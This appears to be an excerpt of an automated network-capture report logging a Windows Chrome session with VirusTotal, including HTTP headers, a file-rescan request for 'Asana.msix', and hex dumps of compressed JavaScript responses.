                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC485INData Raw: cd e4 0f 0f 65 2e 07 dc 2e 4c b2 32 85 26 4f 7e 49 a3 25 02 8c 37 4a 5b f3 a5 d1 6f f2 66 ca b4 18 8f 5c 58 08 55 87 eb 45 de e2 e4 8a e6 50 99 89 bd 64 30 c4 29 d3 a4 91 14 f1 f2 a5 35 1c 27 30 c8 e4 43 67 65 d0 70 74 ac 8e f2 16 b8 ce 4a 3e 81 3b 83 55 5f b1 58 5c ac 53 01 7d c0 a4 a7 b8 ee 45 36 c8 be 6f b5 dc 28 76 f2 0b 59 9e 46 78 9d 48 0b c2 52 3c 30 f5 aa c5 21 a7 36 c4 cd 2c ba 5e eb c5 a2 ef b7 69 94 d3 91 8e cf 85 3b c8 c9 77 94 7a c8 cc 31 19 50 c8 32 21 fb 9e 49 fa 2f c8 58 7a 06 a2 63 09 b5 36 6b e5 4e 69 07 a9 19 94 87 44 ab 72 51 89 e1 0d 05 e0 d2 6b 24 e8 20 04 07 1c 65 d9 85 22 10 6d ff 0f 13 74 78 a6 94 5f 06 17 27 76 2f a5 80 60 ef c1 b2 2d 37 8c 53 fa 39 37 e4 c4 cd e1 61 d5 94 c9 e0 d7 8f aa bd e4 6e 0a d9 74 9b 6c 10 79 f1 a0 24 7e
                                                                                                                                                                                                                    Data Ascii: e..L2&O~I%7J[of\XUEPd0)5'0CgeptJ>;U_X\S}E6o(vYFxHR<0!6,^i;wz1P2!I/Xzc6kNiDrQk$ e"mtx_'v/`-7S97antly$~
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 69 0d 0a 30 30 30 30 30 30 30 31 0d 0a 78 0d 0a 30 30 30 30 30 30 30 31 0d 0a bb 0d 0a 30 30 30 30 30 30 30 31 0d 0a 55 0d 0a 30 30 30 30 30 30 30 31 0d 0a f6 0d 0a 30 30 30 30 30 30 30 31 0d 0a 41 0d 0a 30 30 30 30 30 30 30 31 0d 0a b0 0d 0a 30 30 30 30 30 30 30 31 0d 0a dc 0d 0a 30 30 30 30 30 30 30 31 0d 0a aa 0d 0a 30 30 30 30 30 30 30 31 0d 0a 58 0d 0a 30 30 30 30 30 30 30 31 0d 0a 45 0d 0a 30 30 30 30 30 30 30 31 0d 0a 37 0d 0a 30 30 30 30 30 30 30 31 0d 0a 89 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3e 0d 0a 30 30 30 30 66 66 32 0d 0a 6e 80 cd 67 2c 48 76 e1 35 4c c8 2b 9d c1 a0 f5 39 f2 ad 97 62 4a bb 18 9b 64 e1 ec a0 26 1e 1c c5 b5 30 2e e0 f9 76 4a 90 90 5b 38 1e 91 72 28 a6 a8 d5 90 bd ee 56 81 f1 21 37 e2 27 06 56 0b
                                                                                                                                                                                                                    Data Ascii: 00000001i00000001x0000000100000001U0000000100000001A00000001000000010000000100000001X00000001E0000000170000000100000001>0000ff2ng,Hv5L+9bJd&0.vJ[8r(V!7'V
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 29 60 ca f8 5f 59 63 da 23 16 88 00 c7 54 99 68 59 3d 6e 34 57 21 02 92 5f 15 05 43 e3 6a 16 ce f3 90 e3 90 35 99 de 72 70 c3 09 b2 19 19 30 b0 0a 4b dc 24 9c 39 cb 7c 70 c4 cb 09 2e 30 7e 32 8b 49 87 97 9f f3 ee f3 89 d3 47 ad 57 00 49 97 f7 d0 8e 65 33 fa 2c 13 5c 10 a6 43 c0 ac b2 09 5b 86 98 96 8e 5d e2 d7 e7 a2 63 12 e5 94 26 12 fa 12 ca 6a e6 78 a6 77 e2 97 1e 42 48 67 a2 dc 4f da bc 5f da 45 24 b6 30 57 fd 2c 94 23 09 76 b3 c8 17 44 dd 70 38 52 e0 99 a8 41 31 cf d2 dc fb ca e3 b2 a6 ee 1b 5b 30 0f 96 e1 4a 9f 9a 96 50 98 c0 49 3e 19 11 df 59 81 d1 92 ad 74 e4 93 62 ab 12 e5 e4 53 d6 a7 53 b6 f5 82 a8 5b a7 7f bd 15 4c 0c 0a 79 d4 db f1 b2 d1 be b4 8f 6c 7c e3 d6 94 b5 2c 9b e7 d7 ba 7c 2c 25 9f 85 fc 0a c8 af 0c f2 e0 09 8e 32 0b 63 69 4e 35 82 d8
                                                                                                                                                                                                                    Data Ascii: )`_Yc#ThY=n4W!_Cj5rp0K$9|p.0~2IGWIe3,\C[]c&jxwBHgO_E$0W,#vDp8RA1[0JPI>YtbSS[Lyl|,|,%2ciN5
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 1a 99 ab 48 76 f5 8e d0 f1 c8 ac 25 63 c0 b5 bd de 39 ea bb 7d c8 38 06 cb 98 c8 98 e7 00 7b 04 7d e8 c8 70 2d cf 5d bb a2 7c 3c 3b 05 23 33 a2 39 77 4e 7a e3 53 59 d7 0c 4f 1f d1 15 cc fb ad 56 bd 73 fa a9 63 af 0d 7b 0b 52 af 73 d2 e9 95 1b 07 73 68 36 e8 74 8e 8f cf 1a 33 69 b6 39 43 72 b1 e1 5c 99 4f b3 c9 c9 b4 7b dc 95 59 2d 48 6a 6c 0d 64 73 08 71 f5 67 1b 98 a5 82 6e 94 ad c7 b9 de d9 93 d9 74 3a 93 6d 57 11 c5 6e a1 3a f4 53 27 48 ad 7e 32 3b 57 8a eb f5 82 d6 2a fb b3 23 b3 1b 85 a9 a0 cd 55 c3 63 ab f6 94 ec 67 21 42 ad 3a 54 5d 33 36 13 a0 56 3b 99 e1 c7 70 04 26 6f 57 da 1b b0 9c b8 7e 55 ac 1a fd 7c 3a 3e 9b 99 a9 95 1c 31 6e b4 9a f4 e8 a7 41 80 46 9b 71 67 aa c6 22 aa 98 08 8d 06 e7 e7 93 70 26 13 2d 09 d1 68 33 eb 4f 4e cf 85 f5 0c 31 1a
                                                                                                                                                                                                                    Data Ascii: Hv%c9}8{}p-]|<;#39wNzSYOVsc{Rssh6t3i9Cr\O{Y-Hjldsqgnt:mWn:S'H~2;W*#Ucg!B:T]36V;p&oW~U|:>1nAFqg"p&-h3ON1
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC51INData Raw: 1b df e2 61 e5 0d 39 df 4a 26 5c 86 d9 27 a4 a7 70 02 d4 00 0e 2c 38 fa 3a df 0c 77 17 17 45 c0 79 23 1b ca a3 44 80 7e 40 24 1e d2 3f fe 34 4a 39 0d 0a
                                                                                                                                                                                                                    Data Ascii: a9J&\'p,8:wEy#D~@$?4J9
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1128INData Raw: 30 30 30 30 30 30 30 31 0d 0a 0d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 06 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ea 0d 0a 30 30 30 30 30 30 30 31 0d 0a 76 0d 0a 30 30 34 31 65 0d 0a a8 85 0b a7 0f 0d 38 82 2e 45 60 b8 d9 00 44 57 60 ed 22 90 4b d5 25 38 7d c5 da 79 16 21 b9 3b c5 e3 d1 79 11 e8 bb e7 78 d2 91 14 10 ed 35 b4 2b f7 dc 0d df 34 ca 07 da f8 28 6f 8e db 10 e8 52 fb 06 9e 15 a4 27 fa 0b 35 cb 07 9d da e8 b8 ed df 35 1b 0f 27 18 2c f6 01 eb 18 56 ab a1 08 4a ee bf 55 5d 04 f4 64 40 03 08 31 d5 5e 10 8d 4a 00 c0 35 f5 12 00 52 d4 34 4f ee ea 0e 13 0d 4f c7 36 ab 8b 40 df 95 df e0 df 01 2b 17 36 05 b4 8f 42 df 89 df dc 82 a3 b5 b8 19 e8 ef 3e 7d b7 87 d1 f5 ba 6a 77 83 82 92 a5 36 7c 34 d1 de e2 03 bb 54 8f a2 18
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001v0041e8.E`DW`"K%8}y!;yx5+4(oR'55',VJU]d@1^J5R4OO6@+6B>}jw6|4T
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    108192.168.2.164985874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1017OUTPOST /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/submissions/add HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Content-Length: 134
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM4MTgxNjQzNTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI1LjIzMw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC134OUTData Raw: 7b 22 64 61 74 61 22 3a 7b 22 6e 61 6d 65 22 3a 22 41 73 61 6e 61 2e 6d 73 69 78 22 2c 22 75 69 64 22 3a 22 66 35 37 61 35 36 36 65 38 33 35 64 38 35 35 35 38 33 34 62 61 34 65 32 34 63 32 34 34 33 35 63 34 32 31 36 66 62 32 36 64 65 30 65 32 34 64 33 33 38 61 31 62 62 35 66 61 37 33 34 64 63 34 62 22 2c 22 63 68 61 6c 6c 65 6e 67 65 22 3a 22 36 43 4c 4e 4b 36 79 35 39 67 6f 46 46 43 30 53 22 7d 7d
                                                                                                                                                                                                                    Data Ascii: {"data":{"name":"Asana.msix","uid":"f57a566e835d8555834ba4e24c24435c4216fb26de0e24d338a1bb5fa734dc4b","challenge":"6CLNK6y59goFFC0S"}}
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 74f661497428146f5d1742a33c11bc97
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:27 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:27 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    109192.168.2.164985974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/63334.fa0abcaaac3e415ca2c7.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 83802d4ff3c3a1d8922123ac01870c5c
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:40:11 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:40:11 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36915
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a 46 0d 0a 30 30 66 66 30 0d 0a 92 ef ff fb 29 60 c6 f1 10 09 08 91 d4 9b 34 e5 68 14 67 d7 f7 da b1 8f a5 ec dd 19 45 2b 83 44 93 84 45 02 5c 00 d4 63
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001}00000001{00000001w0000000100000001F00ff0)`4hgE+DE\c
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: ce cb 89 93 83 48 19 b8 74 3e 68 f0 c7 19 4e 03 60 39 34 de 6d 60 c8 02 44 71 42 03 60 1c 41 8e c9 c8 45 80 bd cf 1b 24 df 93 2b d5 d2 f3 74 a8 e1 6e a6 06 0d 69 ef 39 e0 c9 66 ab 35 cc 5a 51 3c 4e dc 7e e3 e8 e5 16 c1 7c 04 74 75 f4 06 b0 38 89 55 df 49 a0 42 a2 fc ae e7 b4 fd 8e 05 6f 6b 02 a0 5b 58 f4 91 f3 a9 2a 24 e4 48 99 9d da 10 06 5e 24 c7 5a f3 aa 97 55 fe 74 d7 6b 6f e6 f3 aa 78 87 62 1c 91 2c 18 ab 93 d3 53 b7 19 f8 7f 75 bd 99 db 1f 36 cf 41 b6 c8 5f 68 81 ee 36 57 24 b4 7b bf 2e e7 43 95 ae dd 0b 6f 41 7d 79 42 ad 5e 43 33 63 c3 93 b3 e7 7a 7f e7 f3 66 29 5f 07 70 9c a6 c1 dd c6 fc b2 d2 af 3f fd e7 24 99 a9 20 de 78 de 48 97 12 c2 62 60 96 30 5a 66 79 32 7f 3d 53 a4 09 dd 66 23 8b e6 8b 99 6a cd a0 08 82 b4 35 9a 06 69 de 20 7a b8 6b af 7b
                                                                                                                                                                                                                    Data Ascii: Ht>hN`94m`DqB`AE$+tni9f5ZQ<N~|tu8UIBok[X*$H^$ZUtkoxb,Su6A_h6W${.CoA}yB^C3czf)_p?$ xHb`0Zfy2=Sf#j5i zk{
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 72 d0 b1 99 77 0e 80 73 da b2 c0 9c fe b0 35 9c 25 a3 2b b8 7c a9 1a 1b ef 4d 22 0e 83 c6 e5 70 16 c4 57 35 0e ba 69 75 da 6d 67 91 64 60 73 68 73 e6 6c 04 4f 9c b0 85 a0 d3 2d 0d ce 16 41 ec 20 5c 12 b4 72 b8 05 79 b4 68 11 31 0d 70 2d 76 58 d4 c0 2e 88 61 01 2a 67 71 db ea da d2 c7 99 cb 34 21 bc 41 72 08 0c 96 3f cd 13 c4 0a 13 0a a6 88 ab 5a 48 29 9a 94 dc 3a 92 56 f8 15 90 c8 0a fc f7 bf 50 00 ed a3 0a a3 14 ba 00 ba a4 89 78 0a 79 56 b4 4b da f7 db 60 54 2f f3 27 9f fd 0c 67 fb 4c f0 17 19 b7 31 ce ed 59 7b 35 01 69 27 20 ed 27 13 98 a9 6f c5 23 3b 74 d4 79 a5 f9 a1 c6 30 a4 5c 9a 24 21 1e 10 a4 d2 67 2b 15 11 76 d7 40 e2 5a 1f 49 b3 c3 53 a8 a3 d1 95 f3 19 66 53 34 be 6b 41 8e 22 84 66 49 f9 1f 99 af c0 11 11 bc f7 45 b2 20 e2 9e 71 c8 a9 e1 a4 f0
                                                                                                                                                                                                                    Data Ascii: rws5%+|M"pW5iumgd`shslO-A \ryh1p-vX.a*gq4!Ar?ZH):VPxyVK`T/'gL1Y{5i' 'o#;ty0\$!g+v@ZISfS4kA"fIE q
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC429INData Raw: da 43 84 96 5f 53 db 65 d9 a7 03 0f 28 95 40 86 7b 34 7d 4d f0 9b 54 1c 32 f3 c7 b2 4c b1 67 61 a4 6a b2 9e 4c a9 46 81 cb 4f 94 2f a6 a4 a4 d5 c8 3a a6 2a 17 3d 8e 52 19 d6 9f c8 6a d8 83 65 f3 36 a7 b5 ac da 66 43 43 a2 04 2c 4d 69 99 ae 9c c7 eb d9 f0 c9 8e 36 e1 09 ec 18 e5 40 b8 98 ca a3 b4 63 a6 fd c1 40 30 94 25 69 27 c0 09 28 2c 15 e9 4a 04 89 73 9d a1 12 c1 8a 54 92 9b 88 67 8a 10 43 50 09 51 e9 28 92 b8 c0 f0 9f 28 6d 8c 28 d6 4f a8 92 19 5d d5 62 43 16 50 c4 66 91 62 96 68 37 85 aa a6 db 26 aa 41 5e 49 83 63 20 a5 21 dd e2 46 1d 62 3a 29 ec 6b 04 21 a6 db 78 58 bc 6a ed 57 90 c3 39 b0 fc 0f 79 b6 88 93 21 8a 92 20 8a 32 2f 96 b3 55 79 1a d0 2c 2c 0b fc e0 57 4a 74 46 87 b5 38 66 a2 97 4e f5 48 12 31 a9 63 62 62 73 d6 9c 2f f9 b0 9a b5 d2 a3 19
                                                                                                                                                                                                                    Data Ascii: C_Se(@{4}MT2LgajLFO/:*=Rje6fCC,Mi6@c@0%i'(,JsTgCPQ((m(O]bCPfbh7&A^Ic !Fb:)k!xXjW9y! 2/Uy,,WJtF8fNH1cbbs/
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a e7 0d 0a 30 30 30 30 30 30 30 31 0d 0a f2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 97 0d 0a 30 30 30 30 30 30 30 31 0d 0a b0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 19 0d 0a 30 30 30 30 30 30 31 0d 0a 9c 0d 0a 30 66 66 61 0d 0a 7a 13 46 57 83 c0 87 1b 08 e7 db 2e f6 32 d1 6e 09 99 8e fc e9 99 c4 54 c9 c5 cd 7e 06 2b fd c2 de 3f f2 fd 28 d1 cb 2f e7 cc 3e a2 31 2e 89 d3 e0 38 fd c1 cf 70 d8 05 0a 49 83 67 89 24 0b fe 99 bd ec 4c 56 8b 90 2f 08 46 3a 32 ba 46 19 d0 65 b6 9c a3 ec ea ce 66 11 89 da d6 58 c4 3c a0 6b 50 b0 95 0f 94 a6 38 be d4 c6 18 86 28 ea 0c 75 09 95 6f 4a 6f 4a 0e 79 00 8a c5 26 01 f6 ec 41 7c bd ce 6e db 43 e9 69 91 6c db d0 9c a6 42 82 e2 28 01 55 0f d4 93 17 f5 58 0a 2b 67 63 99 bc 78 11 9c 33 09 2b 2a fb c2 26 93
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000010ffazFW.2nT~+?(/>1.8pIg$LV/F:2FefX<kP8(uoJoJy&A|nCilB(UX+gcx3+*&
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 21 2e f7 17 fe 3f 57 87 93 05 86 9b 11 14 d3 0e 10 b5 36 d5 09 59 b9 1e 54 32 94 97 23 d6 55 5a 71 a8 13 bd 74 63 a2 69 2e 57 39 19 d9 61 a0 98 07 0a 54 09 83 29 10 ef c4 f5 06 50 c6 22 39 5d 72 40 59 85 e8 66 73 a7 81 6c 34 5d ba 8b 0a 76 7d 1d 02 87 27 d0 f7 18 22 94 2e ac 0d 10 47 78 e3 1f 98 73 2a 66 7a 4e e7 0d 37 3a f5 9d 12 ec 36 b0 27 42 e0 66 e8 79 74 81 6b 9f c8 96 07 e2 f7 97 17 3b 34 57 71 15 06 5d 60 5b 07 4c a2 57 79 73 e6 f6 10 6c 9f 47 99 c2 72 b3 64 76 ad d0 84 1b 75 2a 6e 62 0a ab 78 ff d2 72 41 0c 36 3a dc 9c 73 70 19 c5 b1 a8 58 93 2b b5 c6 8e 25 b6 d3 e0 9b cd e2 29 02 cc 38 63 2f fc 60 b1 98 dd 51 2e 09 45 ff fa ae ae c3 1e c8 f3 66 24 21 6c 2f f0 1a b4 c5 0d 0f 88 17 63 02 c2 a7 32 86 39 9d 07 65 4d a9 37 21 bb 7f 0d 57 0a 77 1c 9c
                                                                                                                                                                                                                    Data Ascii: !.?W6YT2#UZqtci.W9aT)P"9]r@Yfsl4]v}'".Gxs*fzN7:6'Bfytk;4Wq]`[LWyslGrdvu*nbxrA6:spX+%)8c/`Q.Ef$!l/c29eM7!Ww
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1359INData Raw: 77 70 48 65 c4 78 99 10 da 22 bc c6 a3 49 a7 b7 8f 80 28 bf bf 88 52 ed 5e a3 37 4d 20 01 56 bf c7 4e cd 06 e9 ff 1e af 7f 8f b9 bb 79 4e 31 45 a4 60 47 57 74 33 20 0e 2f 5c 84 a9 c5 bc 90 47 cb 2e a8 88 59 92 5a 6f da c8 f0 0e a0 18 36 d0 5d 6b 38 71 05 68 f5 d9 c2 f4 a1 ab 5d 18 e0 38 0b 48 0b 98 d5 3d 67 77 21 0d f2 22 93 9e d3 69 2f 6e 9d 76 0d c8 11 10 bf f6 7e 87 99 a1 31 0a 04 27 0d a5 35 53 e3 5c 1e b5 81 b7 d8 f0 2a da b1 d4 e2 79 06 d8 c3 75 89 66 8f 8a 0d 90 a1 8f 66 21 5e 30 84 06 29 81 42 1d 87 5b 99 f0 6b 83 35 91 f8 f6 79 31 31 96 02 7f 14 d7 d8 b1 87 f2 52 92 a1 0c 60 0a 6a 52 89 0d a6 d5 d9 8a 88 d3 6a d9 6d 2d 12 a1 3d 67 1b 84 e1 d5 15 c4 b4 af b4 69 82 e9 02 26 c2 5c 7f c4 ee 42 a9 3a 3f 08 7e 6c 96 ea 57 36 21 20 d9 43 91 dc 54 a5 51
                                                                                                                                                                                                                    Data Ascii: wpHex"I(R^7M VNyN1E`GWt3 /\G.YZo6]k8qh]8H=gw!"i/nv~1'5S\*yuff!^0)B[k5y11R`jRjm-=gi&\B:?~lW6! CTQ
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 51 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 43 0d 0a 30 38 34 37 0d 0a fa a9 62 bf 31 a6 bd d7 ee 16 07 07 6b a8 0f 68 b7 a9 0e 45 80 98 95 d4 c7 1c b4 c1 29 d5 f5 d4 87 ec 85 1d bc 75 41 c0 20 49 31 85 aa a0 84 85 85 ad cd 21 9c de f8 d2 00 b3 55 c3 49 0b 3a 1b 57 63 68 2b c7 61 38 d6 c7 ae 24 8a 3d 42 b5 e9 a7 4a 90 4a ff 68 7c a8 94 f4 f3 86 56 3a 77 c7 db e6 34 1a 42 d8 fd 38 aa 5d a5 cf b3 de d4 4a 77 a0 3a 66 6e 21 40 a5 77 34 c6 8f cc cc 8b b7 3b ed 03 58 2c 5c dc fa 62 f1 87 e1 f0 60 6c 96 56 46 47 6a a3 46 5d fa a9 11 a0 36 66 d8 0e d5 50 8b 2a 21 42 6d c0 e1 e1 28 18 eb 85 16 84 a8 8d 19 ef 8e f6 0f 35 eb 19 62 d4 86 a8 83 60 3f d0 a7 47 13 a4 36 c2 16 53 42 94 da 00 5b 04 89 31 cc
                                                                                                                                                                                                                    Data Ascii: 00000001Q0000000100000001C0847b1khE)uA I1!UI:Wch+a8$=BJJh|V:w4B8]Jw:fn!@w4;X,\b`lVFGjF]6fP*!Bm(5b`?G6SB[1
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC758INData Raw: 2d 46 49 ba 45 74 02 ad 61 fd a7 4a 98 8f de ea ff 14 e5 b3 ce e1 53 94 ef 29 ca 57 c4 54 9f a2 7c 76 dc ec 29 ca c7 65 40 65 1c f0 29 ca f7 14 e5 33 1e b5 98 58 b5 18 d7 53 94 af f0 ce 4d 58 f0 29 ca f7 14 e5 43 51 5e 19 91 33 71 2c 3b 5a f6 14 e5 ab f8 03 08 9d 3c 45 f9 1e 88 47 3e 45 f9 4c 28 d2 68 9f 22 08 68 3c 62 1e b0 d1 fb 14 e5 fb 7a 94 2f c0 65 4a aa 05 e7 50 68 e1 ac 57 25 13 b2 61 d5 1e 4d 76 e4 48 90 10 e3 b4 72 19 b1 92 f0 54 20 55 cb ab 9a 00 94 6c 43 15 58 2d 19 81 6b c1 5c fd 77 4e 2f 7f b9 90 8a ee 73 be 9c 86 aa 9d c7 bb f4 7c b2 18 13 d1 7a 10 b5 c7 e3 9a 3a 34 a7 23 98 3a 55 d0 5e 4b 73 8f c3 9d 52 98 28 91 cf eb 28 8b 70 75 d4 5d 25 cb 1c 04 53 3d 33 74 25 65 7c bd 36 be 41 0c b5 9f 3a 45 68 90 12 e3 89 2a c2 4d 0b 3d dc d2 01 41 dd
                                                                                                                                                                                                                    Data Ascii: -FIEtaJS)WT|v)e@e)3XSMX)CQ^3q,;Z<EG>EL(h"h<bz/eJPhW%aMvHrT UlCX-k\wN/s|z:4#:U^KsR((pu]%S=3t%e|6A:Eh*M=A
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    110192.168.2.164986074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/50361.77111c62cbde58b54cb1.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
